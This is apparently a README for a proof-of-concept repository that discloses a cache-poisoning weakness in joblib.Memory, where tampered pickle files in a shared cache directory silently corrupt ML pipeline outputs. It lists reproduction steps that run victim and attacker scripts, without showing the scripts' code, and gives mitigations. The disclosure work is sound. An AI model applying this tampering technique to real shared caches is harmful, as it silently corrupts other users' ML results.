Joblib Cache Poisoning Proof-of-Concept
Overview
This repository demonstrates a security vulnerability in joblib.Memory where cached ML artifacts can be silently modified due to lack of integrity verification.
The issue allows an attacker with write access to a shared cache directory to tamper with serialized .pkl artifacts, resulting in corrupted outputs during model execution.
Vulnerability Summary
- Type: ML Cache Integrity Bypass / Deserialization Trust Issue
- Library: joblib (Memory caching system)
- Impact: Silent corruption of ML pipeline outputs
- Root Cause: No integrity validation on cached pickle artifacts
Attack Scenario
In shared or multi-tenant environments:
- joblib caches function outputs as
.pklfiles - Cache files are stored in deterministic filesystem paths
- Attacker modifies cached artifacts directly
- Victim re-executes function and receives corrupted output
Repository Structure
joblib-cache-poc/
β
βββ poc/
β βββ victim.py # normal ML pipeline using joblib.Memory
β βββ attacker.py # cache poisoning script
β
βββ shared_cache/ # generated cache directory (optional)
β
βββ Report.md # full vulnerability analysis
βββ README.md
Reproduction Steps
1. Run victim pipeline
python poc/victim.py
Expected output:
[1. 2. 3.]
2. Run attacker cache poisoning
python poc/attacker.py
This modifies cached .pkl artifact in shared cache directory.
3. Re-run victim pipeline
python poc/victim.py
Observed output:
['CORRUPTED_FEATURE_VECTOR', [999, 999, 999]]
Security Impact
- Silent corruption of ML outputs
- Cross-process cache contamination
- Broken trust boundary between filesystem and ML execution
- No runtime error or warning generated
Affected Component
- joblib.Memory
- joblib.numpy_pickle._unpickle
- joblib.store_backend.load_item
- Python pickle deserialization layer
Mitigation
- Add cryptographic integrity checks (HMAC/signatures) for cache artifacts
- Isolate cache per user/process
- Avoid shared writable cache directories
- Replace raw pickle usage in shared environments
Author
Nguyen Duc Canh (canhnguyen26)
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support